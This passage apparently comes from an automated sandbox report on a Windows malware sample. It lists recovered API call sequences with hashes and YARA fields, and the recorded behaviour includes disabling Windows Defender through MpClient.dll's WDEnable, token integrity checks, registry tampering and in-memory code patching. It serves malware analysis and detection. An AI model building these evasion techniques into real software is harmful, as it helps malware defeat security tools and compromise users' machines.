                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: memset$Heap$AllocCloseOpenProcessQueryValuelstrcpyn
                                                                                                                                                                                                            • String ID: 698896B4a$software\microsoft
                                                                                                                                                                                                            • API String ID: 217510255-2086362228
                                                                                                                                                                                                            • Opcode ID: 13b713a950e6957190f99bcf5d654bc9325bf44c57b760965c84fee10d47e055
                                                                                                                                                                                                            • Instruction ID: 1901724a7288bbe702ed13dbb7a547ebc370532850a48d1f11987cf042e34688
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 13b713a950e6957190f99bcf5d654bc9325bf44c57b760965c84fee10d47e055
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3B31C671D412586AEB25DB64CC4ABEF7B7CEF04705F4045D8E749E7180E7F09A888BA0
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • OpenProcess.KERNEL32(00000400,00000000,00000000,00000000,00000000,76F90F00,?,?,?,?,?,?,?,?,02BB7F74), ref: 02BD4895
                                                                                                                                                                                                            • OpenProcessToken.ADVAPI32(00000000,00000018,?,?,?,?,?,?,?,?,?,02BB7F74), ref: 02BD48AC
                                                                                                                                                                                                            • GetTokenInformation.KERNELBASE(?,00000007(TokenIntegrityLevel),?,00000010,?,?,?,?,?,?,?,?,?,02BB7F74), ref: 02BD48CA
                                                                                                                                                                                                            • CharUpperA.USER32(?,?,?,?,?,?,?,?,?,02BB7F74), ref: 02BD48E2
                                                                                                                                                                                                            • CharUpperA.USER32(?,?,?,?,?,?,?,?,?,02BB7F74), ref: 02BD4908
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(?,00000000), ref: 02BD493B
                                                                                                                                                                                                            • FindCloseChangeNotification.KERNEL32(?), ref: 02BD494C
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(00000000,?), ref: 02BD495E
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 02BD496F
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: HandleInformation$CharCloseOpenProcessTokenUpper$ChangeFindNotification
                                                                                                                                                                                                            • String ID: *SYSTEM*$ADVA
                                                                                                                                                                                                            • API String ID: 4044281766-3691563785
                                                                                                                                                                                                            • Opcode ID: 070f051068cf108f6ac8d6db46d2bdafb25315ddf0566f03980b57bdce55c427
                                                                                                                                                                                                            • Instruction ID: d8b115841d5c091acce9d9a813f0d02a609d9044164bb3ea084c23ad5a695ec5
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 070f051068cf108f6ac8d6db46d2bdafb25315ddf0566f03980b57bdce55c427
                                                                                                                                                                                                            • Instruction Fuzzy Hash: BC31C471D40209AFEB20CBA5C888FEE7BB8FB44355F8884D8EB4567081E7789508CB60
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • memset.MSVCRT ref: 0040211E
                                                                                                                                                                                                            • SHGetFolderPathA.SHELL32(00000000,00000026,00000000,00000000,?), ref: 00402134
                                                                                                                                                                                                            • PathAppendA.SHLWAPI(?,Windows Defender), ref: 0040214A
                                                                                                                                                                                                            • SetCurrentDirectoryA.KERNEL32(?), ref: 00402157
                                                                                                                                                                                                            • LoadLibraryA.KERNEL32(MpClient.dll), ref: 00402166
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,WDEnable), ref: 0040217B
                                                                                                                                                                                                            • FreeLibrary.KERNEL32(00000000), ref: 004021AC
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2580738627.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2580738627.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: LibraryPath$AddressAppendCurrentDirectoryFolderFreeLoadProcmemset
                                                                                                                                                                                                            • String ID: MpClient.dll$WDEnable$Windows Defender$v-@
                                                                                                                                                                                                            • API String ID: 1010965793-1794910726
                                                                                                                                                                                                            • Opcode ID: 9a8801f81893ad2c186c2148835d49196fca5eda48d8657e7ad32c24086763b8
                                                                                                                                                                                                            • Instruction ID: 6149f717096a9febd0c21d278ea6f34184d08bed9f30ffe58492fd99f82aed82
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9a8801f81893ad2c186c2148835d49196fca5eda48d8657e7ad32c24086763b8
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5A11D5B2940318BFD7219FA4DD49FAEB76CEB48710F00037AF705B22C0D27C4A418AA8
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • CoInitializeEx.OLE32(00000000,00000002), ref: 0040269F
                                                                                                                                                                                                            • GetModuleFileNameW.KERNEL32(00000000,?,00000104,00000000), ref: 004026CD
                                                                                                                                                                                                            • SysAllocString.OLEAUT32(?), ref: 004026E0
                                                                                                                                                                                                            • SysAllocString.OLEAUT32(Windows Explorer), ref: 004026F2
                                                                                                                                                                                                            • CoCreateInstance.OLE32(00404E70,00000000,00004401,00404E80,?), ref: 0040271B
                                                                                                                                                                                                            • CoCreateInstance.OLE32(00404E90,00000000,00004401,00404EA0,?), ref: 004027CF
                                                                                                                                                                                                            • SysFreeString.OLEAUT32(00402DB5), ref: 0040285D
                                                                                                                                                                                                            • SysFreeString.OLEAUT32(00000000), ref: 00402864
                                                                                                                                                                                                            • CoUninitialize.OLE32 ref: 004028BE
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2580738627.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2580738627.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: String$AllocCreateFreeInstance$FileInitializeModuleNameUninitialize
                                                                                                                                                                                                            • String ID: Windows Explorer
                                                                                                                                                                                                            • API String ID: 1140695583-228612681
                                                                                                                                                                                                            • Opcode ID: 4af7e25e07fe91e1fd00f1fb65f3c817a061b1e1e25a39bc6d6eebae34654fce
                                                                                                                                                                                                            • Instruction ID: b52a01207190e4a30f96b10a649eeabca6697c1dd3b0d782d0755018a236c0da
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4af7e25e07fe91e1fd00f1fb65f3c817a061b1e1e25a39bc6d6eebae34654fce
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2E714175A006169FCB10EB99CD88DAFB7B9AF88300B24816AE504F73D0D7B5ED42CB54
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • memset.MSVCRT ref: 02BD5023
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000008,00000110,?,00000000,00000000), ref: 02BD5032
                                                                                                                                                                                                            • RtlAllocateHeap.NTDLL(00000000,?,00000000,00000000), ref: 02BD5039
                                                                                                                                                                                                            • memset.MSVCRT ref: 02BD5051
                                                                                                                                                                                                            • GetUserNameA.ADVAPI32(00000000,00000104), ref: 02BD5068
                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,?,?,00000000,00000000), ref: 02BD506E
                                                                                                                                                                                                              • Part of subcall function 02BC41E0: GetProcessHeap.KERNEL32(00000008,02BD5097,00000000,76DC34D0,?,?,02BD5084,00000104,?,?,?,?,00000000,00000000), ref: 02BC41FE
                                                                                                                                                                                                              • Part of subcall function 02BC41E0: HeapAlloc.KERNEL32(00000000,?,?,02BD5084,00000104,?,?,?,?,00000000,00000000), ref: 02BC4205
                                                                                                                                                                                                              • Part of subcall function 02BC41E0: memset.MSVCRT ref: 02BC4215
                                                                                                                                                                                                            • GetUserNameA.ADVAPI32(00000000,00000104), ref: 02BD508F
                                                                                                                                                                                                            • StrChrIA.SHLWAPI(?,?,?,00000000,?,?,?,?,00000000,00000000), ref: 02BD50B6
                                                                                                                                                                                                            • lstrcpynA.KERNEL32(?,00000001,00000104,?,?,00000000,?,?,?,?,00000000,00000000), ref: 02BD50CA
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            • ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789, xrefs: 02BD5000
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Heap$memset$NameProcessUser$AllocAllocateErrorLastlstrcpyn
                                                                                                                                                                                                            • String ID: ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789
                                                                                                                                                                                                            • API String ID: 2345603349-374730529
                                                                                                                                                                                                            • Opcode ID: 5fcaa63946aeaee850b0f6c11a0cb1f84f6fcbdf227c041d8ac49a7148819d89
                                                                                                                                                                                                            • Instruction ID: 6789d0d17bad7a8ea0044429a384249f0915499dff3024955db65e8e319df726
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5fcaa63946aeaee850b0f6c11a0cb1f84f6fcbdf227c041d8ac49a7148819d89
                                                                                                                                                                                                            • Instruction Fuzzy Hash: C82136B2D00209ABDB3196648C44BFFBBBDEF84741FA40599F645E7140FB70AA448BA0
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • memset.MSVCRT ref: 02BC2587
                                                                                                                                                                                                            • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?,?,76F8F550,00000000), ref: 02BC259E
                                                                                                                                                                                                            • PathAddBackslashA.SHLWAPI(?,?,76F8F550,00000000), ref: 02BC25AB
                                                                                                                                                                                                            • PathFileExistsA.SHLWAPI(?,?,76F8F550,00000000), ref: 02BC25E7
                                                                                                                                                                                                            • lstrcpynA.KERNEL32(02C09F08,00000000,00000104,00000000,00000001,?,76F8F550,00000000), ref: 02BC2611
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000,?,76F8F550,00000000), ref: 02BC2620
                                                                                                                                                                                                            • HeapValidate.KERNEL32(00000000,?,76F8F550,00000000), ref: 02BC2623
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000,?,76F8F550,00000000), ref: 02BC2630
                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000,?,76F8F550,00000000), ref: 02BC2633
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Heap$Path$Process$BackslashExistsFileFolderFreeValidatelstrcpynmemset
                                                                                                                                                                                                            • String ID: 698893a4a
                                                                                                                                                                                                            • API String ID: 780088666-3558868419
                                                                                                                                                                                                            • Opcode ID: 9dbb76e8f308827b1752c4d35afe026d6fb98b8024b167208e19abd5d2b7768f
                                                                                                                                                                                                            • Instruction ID: ba57be0b6a028b7d7e3e7fe08f20b1a04dcb2f4b129eb11f6b97c965d30d6848
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9dbb76e8f308827b1752c4d35afe026d6fb98b8024b167208e19abd5d2b7768f
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 26110671A8031467D770A6385C19FDB7B6CDB90B41F504594FA86AB1C0DFF19880CBE0
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,?,00000000,?,?,00000000), ref: 02BC4EFF
                                                                                                                                                                                                            • HeapValidate.KERNEL32(00000000,?,?,00000000), ref: 02BC4F02
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000,?,?,00000000), ref: 02BC4F0F
                                                                                                                                                                                                            • RtlFreeHeap.NTDLL(00000000,?,?,00000000), ref: 02BC4F12
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000,?,?,00000000), ref: 02BC4F2A
                                                                                                                                                                                                            • HeapValidate.KERNEL32(00000000,?,?,00000000), ref: 02BC4F2D
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000,?,?,00000000), ref: 02BC4F3A
                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000,?,?,00000000), ref: 02BC4F3D
                                                                                                                                                                                                            • InternetCloseHandle.WININET(00000000), ref: 02BC4F53
                                                                                                                                                                                                            • InternetCloseHandle.WININET(00000000), ref: 02BC4F5D
                                                                                                                                                                                                            • InternetCloseHandle.WININET(00000000), ref: 02BC4F67
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Heap$Process$CloseHandleInternet$FreeValidate
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 278890334-0
                                                                                                                                                                                                            • Opcode ID: 2c686425698de2403f40b16b554f99eea468f0dd0307e8937ec7fcd08a892860
                                                                                                                                                                                                            • Instruction ID: cf9245de8cd8d9da76434fd6610c96fdf8c3b640081f8a1eccf4fd1b808d090e
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2c686425698de2403f40b16b554f99eea468f0dd0307e8937ec7fcd08a892860
                                                                                                                                                                                                            • Instruction Fuzzy Hash: AE21F031A052146BDB209BB5AC58FEF7BBCEF48315F210899E649E3140DA70CA10CBA0
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • IsUserAnAdmin.SHELL32 ref: 02BC478A
                                                                                                                                                                                                            • memset.MSVCRT ref: 02BC47C0
                                                                                                                                                                                                            • RegOpenKeyExA.ADVAPI32(80000001,software\microsoft,00000000,00000101,?,?,?,00000000), ref: 02BC47E7
                                                                                                                                                                                                            • RegQueryValueExA.ADVAPI32(?,00000001,00000000,00000001,00000000,00000104,?,?,00000000), ref: 02BC480A
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000008,00000015,?,?,00000000), ref: 02BC487D
                                                                                                                                                                                                            • HeapAlloc.KERNEL32(00000000,?,?,00000000), ref: 02BC4884
                                                                                                                                                                                                            • memset.MSVCRT ref: 02BC4894
                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 02BC48C2
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Heapmemset$AdminAllocCloseOpenProcessQueryUserValue
                                                                                                                                                                                                            • String ID: software\microsoft
                                                                                                                                                                                                            • API String ID: 1484339481-3673152959
                                                                                                                                                                                                            • Opcode ID: b71f6749c1284ee3d857510fc7bfbc60269354f3ca321a5477df5c303356efab
                                                                                                                                                                                                            • Instruction ID: c58da3e582630a2366f7ff15a14559b0d2f461616fd3c9762a6a8c5fe225898c
                                                                                                                                                                                                            • Opcode Fuzzy Hash: b71f6749c1284ee3d857510fc7bfbc60269354f3ca321a5477df5c303356efab
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3C411C329041D99BDB25CF659D28FDBBBB8EF81B44F1441D8EE44A7140D770A709CBA0
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • IsUserAnAdmin.SHELL32 ref: 02BCA068
                                                                                                                                                                                                            • RegOpenKeyExA.ADVAPI32(80000001,software\microsoft,00000000,00000101,02BCA227), ref: 02BCA09F
                                                                                                                                                                                                            • RegQueryValueExA.ADVAPI32(02BCA227,698892b0a,00000000,?,00000000,?), ref: 02BCA0BC
                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(02BCA227), ref: 02BCA0C6
                                                                                                                                                                                                            • RegOpenKeyExA.KERNEL32(80000002,software\microsoft,00000000,00000101,?), ref: 02BCA0F9
                                                                                                                                                                                                            • RegQueryValueExA.KERNEL32(?,698892b0a,00000000,?,00000000,?), ref: 02BCA116
                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 02BCA120
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: CloseOpenQueryValue$AdminUser
                                                                                                                                                                                                            • String ID: 698892b0a$software\microsoft
                                                                                                                                                                                                            • API String ID: 2113243795-3865144223
                                                                                                                                                                                                            • Opcode ID: 6f277beb46afed9ec01ca3a0d5c67a64547452e1b1453597688b58647e86cc22
                                                                                                                                                                                                            • Instruction ID: b36c2fa7cfca52b4eddb3fd9db32cd47d687dc15ef5b7814e57e07409f279eeb
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6f277beb46afed9ec01ca3a0d5c67a64547452e1b1453597688b58647e86cc22
                                                                                                                                                                                                            • Instruction Fuzzy Hash: CD212C75E40209FBEB10DFA4CC95FEEBBB8EB48744F504599EA01E7180E7B4A6148B94
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • IsUserAnAdmin.SHELL32 ref: 02BC36B8
                                                                                                                                                                                                            • RegOpenKeyExA.ADVAPI32(80000001,software\microsoft,00000000,00000101,?), ref: 02BC36EF
                                                                                                                                                                                                            • RegQueryValueExA.ADVAPI32(?,698892F8a,00000000,?,00000000,?), ref: 02BC370C
                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 02BC3716
                                                                                                                                                                                                            • RegOpenKeyExA.KERNEL32(80000002,software\microsoft,00000000,00000101,?), ref: 02BC3749
                                                                                                                                                                                                            • RegQueryValueExA.KERNEL32(?,698892F8a,00000000,?,00000000,?), ref: 02BC3766
                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 02BC3770
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: CloseOpenQueryValue$AdminUser
                                                                                                                                                                                                            • String ID: 698892F8a$software\microsoft
                                                                                                                                                                                                            • API String ID: 2113243795-397239082
                                                                                                                                                                                                            • Opcode ID: f765742468255dee4e07ef6b74f033bde6cff856ab9b8af0897135fae83e7bdf
                                                                                                                                                                                                            • Instruction ID: 98ae6b11a15e2920a8d307366be80f179d44f40412deb0ba75f8291c18946f74
                                                                                                                                                                                                            • Opcode Fuzzy Hash: f765742468255dee4e07ef6b74f033bde6cff856ab9b8af0897135fae83e7bdf
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 34212F75E50209FBEB10DFA4CC85FEEBBB8EB44744F90459AE601E7180E7B4A6148B94
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • memset.MSVCRT ref: 02BC4664
                                                                                                                                                                                                            • RegOpenKeyExA.KERNEL32(00000104,software\microsoft,00000000,00000101,80000002,?,00000000,00000000), ref: 02BC4687
                                                                                                                                                                                                            • RegQueryValueExA.KERNEL32(80000002,?,00000000,00000001,00000000,00000104,?,00000000,00000000), ref: 02BC46AA
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000008,00000015,?,00000000,00000000), ref: 02BC471D
                                                                                                                                                                                                            • HeapAlloc.KERNEL32(00000000,?,00000000,00000000), ref: 02BC4724
                                                                                                                                                                                                            • memset.MSVCRT ref: 02BC4734
                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(80000002,?,00000000,00000000), ref: 02BC4762
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Heapmemset$AllocCloseOpenProcessQueryValue
                                                                                                                                                                                                            • String ID: software\microsoft
                                                                                                                                                                                                            • API String ID: 4043890984-3673152959
                                                                                                                                                                                                            • Opcode ID: 845834a5690346626940000325082f9039b97e9904ce517a21d506ada99f682f
                                                                                                                                                                                                            • Instruction ID: 65aba80652946656d5089a921dc38f20a7ee95edbd385ce473e2f8a34ea12d45
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 845834a5690346626940000325082f9039b97e9904ce517a21d506ada99f682f
                                                                                                                                                                                                            • Instruction Fuzzy Hash: DB311C32D00259ABDB32CB648C18FDB7BB8EF86744F1542E9EE5497100D7709B49CBA0
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • IsUserAnAdmin.SHELL32 ref: 02BCA147
                                                                                                                                                                                                            • GetTickCount.KERNEL32 ref: 02BCA159
                                                                                                                                                                                                            • RegOpenKeyExA.KERNEL32(?,software\microsoft,00000000,00000102,02BCA33F,?,02BCA33F), ref: 02BCA173
                                                                                                                                                                                                            • RegSetValueExA.KERNEL32(02BCA33F,698892b0a,00000000,00000004,00000004,00000004,02BCA33F), ref: 02BCA190
                                                                                                                                                                                                            • RegFlushKey.ADVAPI32(?), ref: 02BCA19A
                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 02BCA1A4
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: AdminCloseCountFlushOpenTickUserValue
                                                                                                                                                                                                            • String ID: 698892b0a$software\microsoft
                                                                                                                                                                                                            • API String ID: 287100044-3865144223
                                                                                                                                                                                                            • Opcode ID: 2ddfe3d048bbadbefc164be5799ba2f99ef6b385b310f5b794357abd32c61b00
                                                                                                                                                                                                            • Instruction ID: e8ae4ab36f47a3ee8a0ea2401fe34e19b0b3e41f8a59cc8cc13faddb8886655b
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2ddfe3d048bbadbefc164be5799ba2f99ef6b385b310f5b794357abd32c61b00
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4BF03C75A81218FBE720ABA09D49F9E7B78AB04741F904544FB02A7280D6716A108BE4
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • VirtualAlloc.KERNEL32(00000000,-00000008,00003000,00000040,76F8F550,00000000,753CBD50,?,?,?,02BC98DA,00000000,02BC9730,02C0A04C), ref: 02BCA578
                                                                                                                                                                                                            • memcpy.MSVCRT ref: 02BCA5A0
                                                                                                                                                                                                            • VirtualProtect.KERNEL32(00000000,?,00000040,02BC98DA,?,?,?,?,?,?,02BC98DA,00000000,02BC9730,02C0A04C), ref: 02BCA635
                                                                                                                                                                                                            • VirtualProtect.KERNEL32(?,00000000,00000040,02BC98DA,?,?,?,?,?,?,02BC98DA,00000000,02BC9730,02C0A04C), ref: 02BCA64A
                                                                                                                                                                                                            • VirtualProtect.KERNEL32(?,00000000,02BC98DA,?,?,?,00000000,00000000,?,?,?,?,?,?,02BC98DA,00000000), ref: 02BCA67A
                                                                                                                                                                                                            • VirtualProtect.KERNEL32(?,00000000,02BC98DA,?,?,?,?,?,?,?,02BC98DA,00000000,02BC9730,02C0A04C), ref: 02BCA686
                                                                                                                                                                                                              • Part of subcall function 02BCA6B0: WaitForSingleObject.KERNEL32(?,000003E8,00000000,02BCA693,?,?,?,?,?,?,02BC98DA,00000000,02BC9730,02C0A04C), ref: 02BCA6BC
                                                                                                                                                                                                              • Part of subcall function 02BCA6B0: GetProcessHeap.KERNEL32(00000008,00000030,?,?,?,?,?,?,02BC98DA,00000000,02BC9730,02C0A04C), ref: 02BCA6C6
                                                                                                                                                                                                              • Part of subcall function 02BCA6B0: HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,02BC98DA,00000000,02BC9730,02C0A04C), ref: 02BCA6CD
                                                                                                                                                                                                              • Part of subcall function 02BCA6B0: memset.MSVCRT ref: 02BCA6DE
                                                                                                                                                                                                              • Part of subcall function 02BCA6B0: ReleaseMutex.KERNEL32(?,?,?,?,?,?,?,02BC98DA,00000000,02BC9730,02C0A04C), ref: 02BCA72A
                                                                                                                                                                                                            • GetCurrentProcess.KERNEL32(00000000,00000000,76F8F550,00000000,753CBD50,?,?,?,02BC98DA,00000000,02BC9730,02C0A04C), ref: 02BCA697
                                                                                                                                                                                                            • FlushInstructionCache.KERNEL32(00000000,?,?,?,02BC98DA,00000000,02BC9730,02C0A04C), ref: 02BCA69E
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Virtual$Protect$AllocHeapProcess$CacheCurrentFlushInstructionMutexObjectReleaseSingleWaitmemcpymemset
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 2609073853-0
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • GetSystemWindowsDirectoryA.KERNEL32(?,00000104), ref: 02BD5A7F
                                                                                                                                                                                                            • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00FFAAFF,00000000,00000000,00000000,00000000), ref: 02BD5AB8
                                                                                                                                                                                                            • _snprintf.MSVCRT ref: 02BD5B23
                                                                                                                                                                                                            • _snprintf.MSVCRT ref: 02BD5B86
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
